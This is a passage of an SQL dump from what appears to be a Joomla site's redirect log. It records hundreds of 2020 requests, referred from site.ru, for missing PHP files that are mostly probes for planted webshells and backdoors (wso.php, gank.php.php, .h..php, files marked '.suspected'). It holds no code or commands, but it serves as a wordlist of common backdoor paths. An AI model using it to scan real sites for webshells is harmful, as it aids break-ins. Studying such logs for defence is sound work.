00:00:00',301),(25337,'http://3s-technologies.com.tr/tr/administrator/templates/isis/html/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 09:17:24','0000-00-00 00:00:00',301),(25338,'http://3s-technologies.com.tr/tr/administrator/components/com_akeeba/akeeba/platform/joomla25/filters/gank.php.php',NULL,'http://site.ru','',4,0,'2020-06-29 09:17:36','0000-00-00 00:00:00',301),(25339,'http://3s-technologies.com.tr/tr/administrator/templates/bluestork/css/theme.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 09:45:58','0000-00-00 00:00:00',301),(25340,'http://3s-technologies.com.tr/tr/pressthis/content-post.php',NULL,'http://site.ru','',2,0,'2020-06-29 09:46:12','0000-00-00 00:00:00',301),(25341,'http://3s-technologies.com.tr/tr/xx.php.suspected',NULL,'http://site.ru','',4,0,'2020-06-29 09:46:41','0000-00-00 00:00:00',301),(25342,'http://3s-technologies.com.tr/tr/cache/read.php',NULL,'http://site.ru','',1,0,'2020-06-29 10:14:47','0000-00-00 00:00:00',301),(25343,'http://3s-technologies.com.tr/tr/urbanconcept.rw/wp-catcha.php',NULL,'http://site.ru','',1,0,'2020-06-29 10:44:25','0000-00-00 00:00:00',301),(25344,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/models/forms/.h..php',NULL,'http://site.ru','',1,0,'2020-06-29 11:10:16','0000-00-00 00:00:00',301),(25345,'http://3s-technologies.com.tr/tr/pressthis/popup-pomo.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 12:07:19','0000-00-00 00:00:00',301),(25346,'http://3s-technologies.com.tr/tr/images/galerie-video/theme.php',NULL,'http://site.ru','',1,0,'2020-06-29 12:07:29','0000-00-00 00:00:00',301),(25347,'http://3s-technologies.com.tr/tr/components/com_search/models/sad.php',NULL,'http://site.ru','',2,0,'2020-06-29 12:07:32','0000-00-00 00:00:00',301),(25348,'http://3s-technologies.com.tr/tr/public/hebadge_pagebadge/f6/wp-side.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 12:07:38','0000-00-00 00:00:00',301),(25349,'http://3s-technologies.com.tr/tr/images/articles/cc.php',NULL,'http://site.ru','',1,0,'2020-06-29 12:07:43','0000-00-00 00:00:00',301),(25350,'http://3s-technologies.com.tr/tr/images/feal.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-29 13:04:19','0000-00-00 00:00:00',301),(25351,'http://3s-technologies.com.tr/tr/gallery/large/meuhy.php',NULL,'http://site.ru','',3,0,'2020-06-29 13:31:11','0000-00-00 00:00:00',301),(25352,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/sql/updates/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-29 13:31:44','0000-00-00 00:00:00',301),(25353,'http://3s-technologies.com.tr/tr/components/com_content/models/green.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-29 13:32:00','0000-00-00 00:00:00',301),(25354,'http://3s-technologies.com.tr/tr/administrator/components/com_phocagallery/views/phocagallerycs/tmpl/admin.php',NULL,'http://site.ru','',6,0,'2020-06-29 13:32:04','0000-00-00 00:00:00',301),(25355,'http://3s-technologies.com.tr/tr/components/com_foxcontact/ox.php',NULL,'http://site.ru','',1,0,'2020-06-29 13:32:07','0000-00-00 00:00:00',301),(25356,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/views/profile/ob.php',NULL,'http://site.ru','',1,0,'2020-06-29 14:00:09','0000-00-00 00:00:00',301),(25357,'http://3s-technologies.com.tr/tr/images/wp-te.php',NULL,'http://site.ru','',1,0,'2020-06-29 14:00:57','0000-00-00 00:00:00',301),(25358,'http://3s-technologies.com.tr/tr/administrator/components/com_admintools/liveupdate/language/ru-ru/io.php',NULL,'http://site.ru','',3,0,'2020-06-29 14:29:33','0000-00-00 00:00:00',301),(25359,'http://3s-technologies.com.tr/tr/libraries/f0f/integration/joomla/wp-blog.php',NULL,'http://site.ru','',1,0,'2020-06-29 14:56:15','0000-00-00 00:00:00',301),(25360,'http://3s-technologies.com.tr/tr/components/com_foxcontact/b0x.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 14:57:40','0000-00-00 00:00:00',301),(25361,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/sql/others/mysql/ex_liner.php',NULL,'http://site.ru','',2,0,'2020-06-29 14:57:43','0000-00-00 00:00:00',301),(25362,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/sql/updates/feter.php',NULL,'http://site.ru','',1,0,'2020-06-29 15:25:06','0000-00-00 00:00:00',301),(25363,'http://3s-technologies.com.tr/tr/components/com_foxcontact/ok.php',NULL,'http://site.ru','',2,0,'2020-06-29 15:25:34','0000-00-00 00:00:00',301),(25364,'http://3s-technologies.com.tr/tr/administrator/components/com_associations/layouts/joomla/simple.php5.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 15:25:43','0000-00-00 00:00:00',301),(25365,'http://3s-technologies.com.tr/tr/components/com_finder/helpers/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 15:25:59','0000-00-00 00:00:00',301),(25366,'http://3s-technologies.com.tr/tr/images/articles/jmp2015/theme.php',NULL,'http://site.ru','',1,0,'2020-06-29 15:26:19','0000-00-00 00:00:00',301),(25367,'http://3s-technologies.com.tr/tr/components/com_contenthistory/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-29 15:55:40','0000-00-00 00:00:00',301),(25368,'http://3s-technologies.com.tr/tr/templates/ambient/edits.php',NULL,'http://site.ru','',5,0,'2020-06-29 16:49:58','0000-00-00 00:00:00',301),(25369,'http://3s-technologies.com.tr/tr/homefeatured/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-29 16:50:16','0000-00-00 00:00:00',301),(25370,'http://3s-technologies.com.tr/tr/images/ddd.php',NULL,'http://site.ru','',1,0,'2020-06-29 16:50:49','0000-00-00 00:00:00',301),(25371,'http://3s-technologies.com.tr/tr/administrator/components/com_phocagallery/views/phocagallerym/tmpl/htaccess.php',NULL,'http://site.ru','',3,0,'2020-06-29 17:18:29','0000-00-00 00:00:00',301),(25372,'http://3s-technologies.com.tr/tr/cache/zr.php',NULL,'http://site.ru','',1,0,'2020-06-29 17:48:44','0000-00-00 00:00:00',301),(25373,'http://3s-technologies.com.tr/tr/user-profile.php',NULL,'http://site.ru','',4,0,'2020-06-29 17:48:49','0000-00-00 00:00:00',301),(25374,'http://3s-technologies.com.tr/tr/iaqoja.php',NULL,'http://site.ru','',2,0,'2020-06-29 18:15:12','0000-00-00 00:00:00',301),(25375,'http://3s-technologies.com.tr/tr/cli/vpl20xjb.php',NULL,'http://site.ru','',2,0,'2020-06-29 18:15:32','0000-00-00 00:00:00',301),(25376,'http://3s-technologies.com.tr/tr/cache/wp-site.php',NULL,'http://site.ru','',3,0,'2020-06-29 18:44:08','0000-00-00 00:00:00',301),(25377,'http://3s-technologies.com.tr/tr/administrator/manifests/files/akeebastrapper/data.php',NULL,'http://site.ru','',1,0,'2020-06-29 18:44:14','0000-00-00 00:00:00',301),(25378,'http://3s-technologies.com.tr/tr/.well-known/.secret.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 19:05:39','0000-00-00 00:00:00',301),(25379,'http://3s-technologies.com.tr/tr/components/com_foxcontact/uploads/backup.php',NULL,'http://site.ru','',1,0,'2020-06-29 19:12:27','0000-00-00 00:00:00',301),(25380,'http://3s-technologies.com.tr/tr/tt.php',NULL,'http://site.ru','',47,0,'2020-06-29 19:12:40','0000-00-00 00:00:00',301),(25381,'http://3s-technologies.com.tr/tr/administrator/components/com_associations/feal.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 19:12:48','0000-00-00 00:00:00',301),(25382,'http://3s-technologies.com.tr/tr/.wp-load/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 19:12:55','0000-00-00 00:00:00',301),(25383,'http://3s-technologies.com.tr/tr/images/errors.php',NULL,'http://site.ru','',1,0,'2020-06-29 19:41:41','0000-00-00 00:00:00',301),(25384,'http://3s-technologies.com.tr/tr/fhbvqppxkk.php',NULL,'http://site.ru','',2,0,'2020-06-29 20:09:26','0000-00-00 00:00:00',301),(25385,'http://3s-technologies.com.tr/tr/cache/root.php',NULL,'http://site.ru','',2,0,'2020-06-29 20:09:30','0000-00-00 00:00:00',301),(25386,'http://3s-technologies.com.tr/tr/components/com_jnews/includes/openflashchart/tmp-upload-images/xyxz.php',NULL,'http://site.ru','',3,0,'2020-06-29 20:09:43','0000-00-00 00:00:00',301),(25387,'http://3s-technologies.com.tr/tr/cmvgifotzz.php',NULL,'http://site.ru','',4,0,'2020-06-29 20:09:50','0000-00-00 00:00:00',301),(25388,'http://3s-technologies.com.tr/tr/components/com_foxcontact/css/images.php',NULL,'http://site.ru','',1,0,'2020-06-29 20:10:16','0000-00-00 00:00:00',301),(25389,'http://3s-technologies.com.tr/tr/images/files/licensed.php',NULL,'http://site.ru','',2,0,'2020-06-29 20:38:53','0000-00-00 00:00:00',301),(25390,'http://3s-technologies.com.tr/tr/plugins/twofactorauth/bag.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-29 20:39:56','0000-00-00 00:00:00',301),(25391,'http://3s-technologies.com.tr/tr/yedek/404.php',NULL,'http://site.ru','',2,0,'2020-06-29 21:07:07','0000-00-00 00:00:00',301),(25392,'http://3s-technologies.com.tr/tr/administrator/components/com_imageshow/views/articles/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-29 21:07:16','0000-00-00 00:00:00',301),(25393,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/media-admin.php',NULL,'http://site.ru','',1,0,'2020-06-30 01:25:45','0000-00-00 00:00:00',301),(25394,'http://3s-technologies.com.tr/tr/ghjk.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-30 01:27:03','0000-00-00 00:00:00',301),(25395,'http://3s-technologies.com.tr/tr/components/com_jce/editor/tiny_mce/plugins/tabfocus/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-30 01:53:48','0000-00-00 00:00:00',301),(25396,'http://3s-technologies.com.tr/tr/wp-item.php',NULL,'http://site.ru','',2,0,'2020-06-30 01:54:07','0000-00-00 00:00:00',301),(25397,'http://3s-technologies.com.tr/tr/administrator/components/com_associations/models/indeh.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 01:56:07','0000-00-00 00:00:00',301),(25398,'http://3s-technologies.com.tr/tr/errlog.php',NULL,'http://site.ru','',2,0,'2020-06-30 02:09:09','0000-00-00 00:00:00',301),(25399,'http://3s-technologies.com.tr/tr/images/ws0.php',NULL,'http://site.ru','',2,0,'2020-06-30 02:22:23','0000-00-00 00:00:00',301),(25400,'http://3s-technologies.com.tr/tr/components/com_easyblog/views/blogger/tmpl/wp-block.php',NULL,'http://site.ru','',3,0,'2020-06-30 02:23:07','0000-00-00 00:00:00',301),(25401,'http://3s-technologies.com.tr/tr/components/com_newsfeeds/helpers/wp-table.php',NULL,'http://site.ru','',1,0,'2020-06-30 02:50:55','0000-00-00 00:00:00',301),(25402,'http://3s-technologies.com.tr/tr/images/tes.php.pjpeg',NULL,'http://site.ru','',1,0,'2020-06-30 02:52:20','0000-00-00 00:00:00',301),(25403,'http://3s-technologies.com.tr/tr/administrator/components/com_users/views/admin-class.php',NULL,'http://site.ru','',2,0,'2020-06-30 02:58:52','0000-00-00 00:00:00',301),(25404,'http://3s-technologies.com.tr/tr/images/eventlist/theme.php',NULL,'http://site.ru','',2,0,'2020-06-30 03:19:00','0000-00-00 00:00:00',301),(25405,'http://3s-technologies.com.tr/tr/spam/wp-cons.php',NULL,'http://site.ru','',1,0,'2020-06-30 03:19:56','0000-00-00 00:00:00',301),(25406,'http://3s-technologies.com.tr/tr/images/k.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 03:20:16','0000-00-00 00:00:00',301),(25407,'http://3s-technologies.com.tr/tr/components/com_foxcontact/zc.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-30 03:20:46','0000-00-00 00:00:00',301),(25408,'http://3s-technologies.com.tr/tr/administrator/components/com_contact/pp1.php',NULL,'http://site.ru','',4,0,'2020-06-30 03:47:54','0000-00-00 00:00:00',301),(25409,'http://3s-technologies.com.tr/tr/images/stories/rokstories/kbjkjm.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 03:48:24','0000-00-00 00:00:00',301),(25410,'http://3s-technologies.com.tr/tr/administrator/components/com_installer/views/install/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-30 04:16:02','0000-00-00 00:00:00',301),(25411,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/views/profile/wp-side.php',NULL,'http://site.ru','',1,0,'2020-06-30 05:12:21','0000-00-00 00:00:00',301),(25412,'http://3s-technologies.com.tr/tr/images/phocagallery/bilder/settings.php',NULL,'http://site.ru','',2,0,'2020-06-30 05:12:29','0000-00-00 00:00:00',301),(25413,'http://3s-technologies.com.tr/tr/.well-known/pages.php',NULL,'http://site.ru','',2,0,'2020-06-30 05:38:51','0000-00-00 00:00:00',301),(25414,'http://3s-technologies.com.tr/tr/images/eventlist/images.php',NULL,'http://site.ru','',2,0,'2020-06-30 06:05:13','0000-00-00 00:00:00',301),(25415,'http://3s-technologies.com.tr/tr/homefeatured/ganks.php.php',NULL,'http://site.ru','',2,0,'2020-06-30 06:57:25','0000-00-00 00:00:00',301),(25416,'http://3s-technologies.com.tr/tr/images/joomla3/kathrin/white.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 07:22:24','0000-00-00 00:00:00',301),(25417,'http://3s-technologies.com.tr/tr/assets/wp-info.php',NULL,'http://site.ru','',1,0,'2020-06-30 07:24:09','0000-00-00 00:00:00',301),(25418,'http://3s-technologies.com.tr/tr/gallery.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-30 08:15:09','0000-00-00 00:00:00',301),(25419,'http://3s-technologies.com.tr/tr/cache/green.php',NULL,'http://site.ru','',1,0,'2020-06-30 08:16:17','0000-00-00 00:00:00',301),(25420,'http://3s-technologies.com.tr/tr/blog/xml.php',NULL,'http://site.ru','',4,0,'2020-06-30 08:43:03','0000-00-00 00:00:00',301),(25421,'http://3s-technologies.com.tr/tr/bin/incengine42.php',NULL,'http://site.ru','',2,0,'2020-06-30 08:43:31','0000-00-00 00:00:00',301),(25422,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/com_languages/installed/htaccess.php',NULL,'http://site.ru','',2,0,'2020-06-30 08:43:50','0000-00-00 00:00:00',301),(25423,'http://3s-technologies.com.tr/tr/images/sim5.php',NULL,'http://site.ru','',1,0,'2020-06-30 09:09:12','0000-00-00 00:00:00',301),(25424,'http://3s-technologies.com.tr/tr/images/faculty/licensed.php',NULL,'http://site.ru','',1,0,'2020-06-30 09:09:39','0000-00-00 00:00:00',301),(25425,'http://3s-technologies.com.tr/tr/templates/beez3/a17.php',NULL,'http://site.ru','',1,0,'2020-06-30 09:09:59','0000-00-00 00:00:00',301),(25426,'http://3s-technologies.com.tr/tr/administrator/components/com_cache/views/purge/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-30 09:10:50','0000-00-00 00:00:00',301),(25427,'http://3s-technologies.com.tr/tr/plugins1/editors/tinymce/jscripts/tiny_mce/themes/advanced/.h..php',NULL,'http://site.ru','',1,0,'2020-06-30 09:35:59','0000-00-00 00:00:00',301),(25428,'http://3s-technologies.com.tr/tr/administrator/templates/system/lux.php',NULL,'http://site.ru','',1,0,'2020-06-30 09:36:06','0000-00-00 00:00:00',301),(25429,'http://3s-technologies.com.tr/tr/components/com_docman/views/tree/config.php',NULL,'http://site.ru','',3,0,'2020-06-30 09:37:01','0000-00-00 00:00:00',301),(25430,'http://3s-technologies.com.tr/tr/cache/zz.php',NULL,'http://site.ru','',4,0,'2020-06-30 10:02:08','0000-00-00 00:00:00',301),(25431,'http://3s-technologies.com.tr/tr/.well-known/.well-knownq.php',NULL,'http://site.ru','',2,0,'2020-06-30 10:02:46','0000-00-00 00:00:00',301),(25432,'http://3s-technologies.com.tr/tr/csv/cez.php',NULL,'http://site.ru','',1,0,'2020-06-30 10:02:53','0000-00-00 00:00:00',301),(25433,'http://3s-technologies.com.tr/tr/administrator/components/com_content/views/article/content-post.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 10:55:39','0000-00-00 00:00:00',301),(25434,'http://3s-technologies.com.tr/tr/general/content-post.php',NULL,'http://site.ru','',1,0,'2020-06-30 10:56:08','0000-00-00 00:00:00',301),(25435,'http://3s-technologies.com.tr/tr/wp-contnt/wp-south.php',NULL,'http://site.ru','',3,0,'2020-06-30 10:56:25','0000-00-00 00:00:00',301),(25436,'http://3s-technologies.com.tr/tr/administrator/help/en-gb/css/.h..php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 11:25:17','0000-00-00 00:00:00',301),(25437,'http://3s-technologies.com.tr/tr/wp-cons.php',NULL,'http://site.ru','',3,0,'2020-06-30 11:25:25','0000-00-00 00:00:00',301),(25438,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/views/sysinfo/ob.php',NULL,'http://site.ru','',1,0,'2020-06-30 11:25:33','0000-00-00 00:00:00',301),(25439,'http://3s-technologies.com.tr/tr/components/com_content/views/archive/beastwso-icq-744324366.php',NULL,'http://site.ru','',2,0,'2020-06-30 12:17:27','0000-00-00 00:00:00',301),(25440,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/sql/updates/sqlazure/seter.php',NULL,'http://site.ru','',1,0,'2020-06-30 12:18:40','0000-00-00 00:00:00',301),(25441,'http://3s-technologies.com.tr/tr/components/com_falang/readme.php',NULL,'http://site.ru','',2,0,'2020-06-30 12:19:29','0000-00-00 00:00:00',301),(25442,'http://3s-technologies.com.tr/tr/administrator/includes/img/mode.php',NULL,'http://site.ru','',1,0,'2020-06-30 12:42:32','0000-00-00 00:00:00',301),(25443,'http://3s-technologies.com.tr/tr/wp-function.php',NULL,'http://site.ru','',3,0,'2020-06-30 12:43:04','0000-00-00 00:00:00',301),(25444,'http://3s-technologies.com.tr/tr/images/ict.php',NULL,'http://site.ru','',2,0,'2020-06-30 12:43:24','0000-00-00 00:00:00',301),(25445,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/helpers/html/images.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 13:08:28','0000-00-00 00:00:00',301),(25446,'http://3s-technologies.com.tr/tr/images/ateliers/atelier3/wso.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 13:36:37','0000-00-00 00:00:00',301),(25447,'http://3s-technologies.com.tr/tr/ebkzdc.php',NULL,'http://site.ru','',1,0,'2020-06-30 13:37:30','0000-00-00 00:00:00',301),(25448,'http://3s-technologies.com.tr/tr/ekp/wp-muen.php',NULL,'http://site.ru','',1,0,'2020-06-30 14:31:41','0000-00-00 00:00:00',301),(25449,'http://3s-technologies.com.tr/tr/images/up2.php',NULL,'http://site.ru','',3,0,'2020-06-30 14:32:29','0000-00-00 00:00:00',301),(25450,'http://3s-technologies.com.tr/tr/wp-console.php.suspected',NULL,'http://site.ru','',3,0,'2020-06-30 14:59:36','0000-00-00 00:00:00',301),(25451,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/views/help/gank.php.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 14:59:41','0000-00-00 00:00:00',301),(25452,'http://3s-technologies.com.tr/tr/cache/wp-cofigs.php',NULL,'http://site.ru','',1,0,'2020-06-30 15:28:30','0000-00-00 00:00:00',301),(25453,'http://3s-technologies.com.tr/tr/.haccess.php',NULL,'http://site.ru','',4,0,'2020-06-30 15:54:32','0000-00-00 00:00:00',301),(25454,'http://3s-technologies.com.tr/tr/dod.php',NULL,'http://site.ru','',3,0,'2020-06-30 15:55:20','0000-00-00 00:00:00',301),(25455,'http://3s-technologies.com.tr/tr/connect/feter.php.suspected',NULL,'http://site.ru','',2,0,'2020-06-30 16:51:01','0000-00-00 00:00:00',301),(25456,'http://3s-technologies.com.tr/tr/images/aaction.php',NULL,'http://site.ru','',1,0,'2020-06-30 16:51:31','0000-00-00 00:00:00',301),(25457,'http://3s-technologies.com.tr/tr/images/xsec.php',NULL,'http://site.ru','',1,0,'2020-06-30 16:51:40','0000-00-00 00:00:00',301),(25458,'http://3s-technologies.com.tr/tr/administrator/components/com_banners/sql/data.php.suspected',NULL,'http://site.ru','',1,0,'2020-06-30 17:18:52','0000-00-00 00:00:00',301),(25459,'http://3s-technologies.com.tr/tr/images/thkbth.php',NULL,'http://site.ru','',2,0,'2020-06-30 17:19:05','0000-00-00 00:00:00',301),(25460,'http://3s-technologies.com.tr/tr/administrator/components/com_phocagallery/views/phocagalleryg/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-30 17:19:06','0000-00-00 00:00:00',301),(25461,'http://3s-technologies.com.tr/tr/cache/theme.php',NULL,'http://site.ru','',1,0,'2020-06-30 17:19:13','0000-00-00 00:00:00',301),(25462,'http://3s-technologies.com.tr/tr/administrator/components/com_joomlaupdate/views/update/menus.php',NULL,'http://site.ru','',4,0,'2020-06-30 17:50:04','0000-00-00 00:00:00',301),(25463,'http://3s-technologies.com.tr/tr/images/edit_page.php',NULL,'http://site.ru','',2,0,'2020-06-30 18:13:52','0000-00-00 00:00:00',301),(25464,'http://3s-technologies.com.tr/tr/components/com_foxcontact/c.php',NULL,'http://site.ru','',3,0,'2020-06-30 19:07:07','0000-00-00 00:00:00',301),(25465,'http://3s-technologies.com.tr/tr/images/galerie-video/images.php',NULL,'http://site.ru','',3,0,'2020-06-30 19:07:47','0000-00-00 00:00:00',301),(25466,'http://3s-technologies.com.tr/en/administrator/index.php',NULL,'','',1,0,'2020-06-30 19:26:34','0000-00-00 00:00:00',301),(25467,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/sql/updates/sqlazure/.h..php',NULL,'http://site.ru','',1,0,'2020-06-30 19:34:18','0000-00-00 00:00:00',301),(25468,'http://3s-technologies.com.tr/tr/cache/newsleter.php',NULL,'http://site.ru','',1,0,'2020-06-30 19:34:43','0000-00-00 00:00:00',301),(25469,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/views/ix.php.php',NULL,'http://site.ru','',2,0,'2020-06-30 20:00:41','0000-00-00 00:00:00',301),(25470,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/views/sysinfo/gank.php.php',NULL,'http://site.ru','',1,0,'2020-06-30 20:02:10','0000-00-00 00:00:00',301),(25471,'http://3s-technologies.com.tr/tr/components/com_jooomlas/codex.php',NULL,'http://site.ru','',1,0,'2020-06-30 20:02:15','0000-00-00 00:00:00',301),(25472,'http://3s-technologies.com.tr/tr/administrator/components/com_banners/models/radio.php',NULL,'http://site.ru','',1,0,'2020-06-30 20:29:35','0000-00-00 00:00:00',301),(25473,'http://3s-technologies.com.tr/tr/components/com_content/.h..php.suspected',NULL,'http://site.ru','',3,0,'2020-06-30 20:56:16','0000-00-00 00:00:00',301),(25474,'http://3s-technologies.com.tr/tr/cache/index1.php',NULL,'http://site.ru','',1,0,'2020-06-30 20:57:08','0000-00-00 00:00:00',301),(25475,'http://3s-technologies.com.tr/tr/components/com_mijoshop/opencart/image/data/readme.php',NULL,'http://site.ru','',1,0,'2020-06-30 21:50:56','0000-00-00 00:00:00',301),(25476,'http://3s-technologies.com.tr/tr/f-o.php',NULL,'http://site.ru','',1,0,'2020-06-30 21:51:26','0000-00-00 00:00:00',301),(25477,'http://3s-technologies.com.tr/tr/administrator/components/com_finder/views/filter/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2020-06-30 21:51:31','0000-00-00 00:00:00',301),(25478,'http://3s-technologies.com.tr/tr/action.php',NULL,'http://site.ru','',1,0,'2020-06-30 22:18:06','0000-00-00 00:00:00',301),(25479,'http://3s-technologies.com.tr/tr/assets/assetsu.php',NULL,'http://site.ru','',1,0,'2020-06-30 22:18:06','0000-00-00 00:00:00',301),(25480,'http://3s-technologies.com.tr/tr/components/gank.php.php',NULL,'http://site.ru','',1,0,'2020-06-30 22:18:17','0000-00-00 00:00:00',301),(25481,'http://3s-technologies.com.tr/tr/back/cache/doc.php',NULL,'http://site.ru','',1,0,'2020-06-30 22:18:37','0000-00-00 00:00:00',301),(25482,'http://3s-technologies.com.tr/tr/d3bio9.php',NULL,'http://site.ru','',2,0,'2020-06-30 22:18:44','0000-00-00 00:00:00',301),(25483,'http://3s-technologies.com.tr/tr/templates/ambient/images/multibox/streamed.php',NULL,'http://site.ru','',1,0,'2020-06-30 22:47:49','0000-00-00 00:00:00',301),(25484,'http://3s-technologies.com.tr/tr/fprww1.php',NULL,'http://site.ru','',2,0,'2020-06-30 23:13:44','0000-00-00 00:00:00',301),(25485,'http://3s-technologies.com.tr/tr/administrator/components/com_phocagallery/views/phocagalleryfba/tmpl/languages.php',NULL,'http://site.ru','',1,0,'2020-07-01 00:12:29','0000-00-00 00:00:00',301),(25486,'http://3s-technologies.com.tr/tr/rzzmun.php',NULL,'http://site.ru','',2,0,'2020-07-01 00:34:36','0000-00-00 00:00:00',301),(25487,'http://3s-technologies.com.tr/tr/components/com_banners/models/mod.php.hack',NULL,'http://site.ru','',1,0,'2020-07-01 00:50:01','0000-00-00 00:00:00',301),(25488,'http://3s-technologies.com.tr/tr/sandvox_greyleaf/sitemps.php',NULL,'http://site.ru','',1,0,'2020-07-01 01:28:50','0000-00-00 00:00:00',301),(25489,'http://3s-technologies.com.tr/tr/templates/beez3/css/theme.php',NULL,'http://site.ru','',3,0,'2020-07-01 01:29:07','0000-00-00 00:00:00',301),(25490,'http://3s-technologies.com.tr/tr/components/com_newsfeeds/views/miniv48.php.suspected',NULL,'http://site.ru','',1,0,'2020-07-01 01:56:33','0000-00-00 00:00:00',301),(25491,'http://3s-technologies.com.tr/tr/cli/deep.php',NULL,'http://site.ru','',1,0,'2020-07-01 01:58:45','0000-00-00 00:00:00',301),(25492,'http://3s-technologies.com.tr/tr/.wp-blog-posts.php',NULL,'http://site.ru','',3,0,'2020-07-01 02:50:15','0000-00-00 00:00:00',301),(25493,'http://3s-technologies.com.tr/tr/images/chitradurga/licensed.php',NULL,'http://site.ru','',1,0,'2020-07-01 03:18:55','0000-00-00 00:00:00',301),(25494,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/views/gank.php.php',NULL,'http://site.ru','',1,0,'2020-07-01 03:48:15','0000-00-00 00:00:00',301),(25495,'http://3s-technologies.com.tr/tr/images/downloadprospectus/licensed.php',NULL,'http://site.ru','',1,0,'2020-07-01 04:15:32','0000-00-00 00:00:00',301),(25496,'http://3s-technologies.com.tr/tr/templates/ambient/js/wp-side.php',NULL,'http://site.ru','',3,0,'2020-07-01 04:15:59','0000-00-00 00:00:00',301),(25497,'http://3s-technologies.com.tr/tr/cache/ganks.php.php.suspected',NULL,'http://site.ru','',2,0,'2020-07-01 04:41:38','0000-00-00 00:00:00',301),(25498,'http://3s-technologies.com.tr/tr/cache/mmc.php',NULL,'http://site.ru','',2,0,'2020-07-01 05:09:32','0000-00-00 00:00:00',301),(25499,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/models/feter.php',NULL,'http://site.ru','',1,0,'2020-07-01 05:10:32','0000-00-00 00:00:00',301),(25500,'http://3s-technologies.com.tr/tr/administrator/components/com_komento/assets/images/components/server.php.suspected',NULL,'http://site.ru','',3,0,'2020-07-01 05:10:40','0000-00-00 00:00:00',301),(25501,'http://3s-technologies.com.tr/tr/public/hebadge_pagebadge/simpleside.php5.suspected',NULL,'http://site.ru','',1,0,'2020-07-01 05:36:59','0000-00-00 00:00:00',301),(25502,'http://3s-technologies.com.tr/tr/templates/ambient/images/vertex/responsive/ruf.php5',NULL,'http://site.ru','',4,0,'2020-07-01 06:04:31','0000-00-00 00:00:00',301),(25503,'http://3s-technologies.com.tr/tr/components/com_content/views/archive/ypma90z.php',NULL,'http://site.ru','',2,0,'2020-07-01 07:49:46','0000-00-00 00:00:00',301),(25504,'http://3s-technologies.com.tr/tr/components/com_jce/editor/tiny_mce/plugins/preview/htaccess.php',NULL,'http://site.ru','',3,0,'2020-07-01 07:50:22','0000-00-00 00:00:00',301),(25505,'http://3s-technologies.com.tr/tr/components/com_weblinks/rf8zd3.php',NULL,'http://site.ru','',1,0,'2020-07-01 07:50:55','0000-00-00 00:00:00',301),(25506,'http://3s-technologies.com.tr/tr/cache/config.php',NULL,'http://site.ru','',1,0,'2020-07-01 07:50:57','0000-00-00 00:00:00',301),(25507,'http://3s-technologies.com.tr/tr/fahw3r.php',NULL,'http://site.ru','',4,0,'2020-07-01 08:15:59','0000-00-00 00:00:00',301),(25508,'http://3s-technologies.com.tr/tr/components/com_jce/editor/extensions/mediaplayer/wp-blog.php',NULL,'http://site.ru','',2,0,'2020-07-01 08:18:23','0000-00-00 00:00:00',301),(25509,'http://3s-technologies.com.tr/tr/images/pntn.php',NULL,'http://site.ru','',1,0,'2020-07-01 09:11:45','0000-00-00 00:00:00',301),(25510,'http://3s-technologies.com.tr/tr/images/nyty/images.php',NULL,'http://site.ru','',1,0,'2020-07-01 09:13:10','0000-00-00 00:00:00',301),(25511,'http://3s-technologies.com.tr/tr/cache/lyonc.php',NULL,'http://site.ru','',1,0,'2020-07-01 09:37:19','0000-00-00 00:00:00',301),(25512,'http://3s-technologies.com.tr/tr/bmmive.php',NULL,'http://site.ru','',2,0,'2020-07-01 10:03:42','0000-00-00 00:00:00',301),(25513,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/models/beautifu.php',NULL,'http://site.ru','',2,0,'2020-07-01 10:08:51','0000-00-00 00:00:00',301),(25514,'http://3s-technologies.com.tr/tr/components/com_weblinks/models/forms/wp-table.php',NULL,'http://site.ru','',1,0,'2020-07-01 10:29:39','0000-00-00 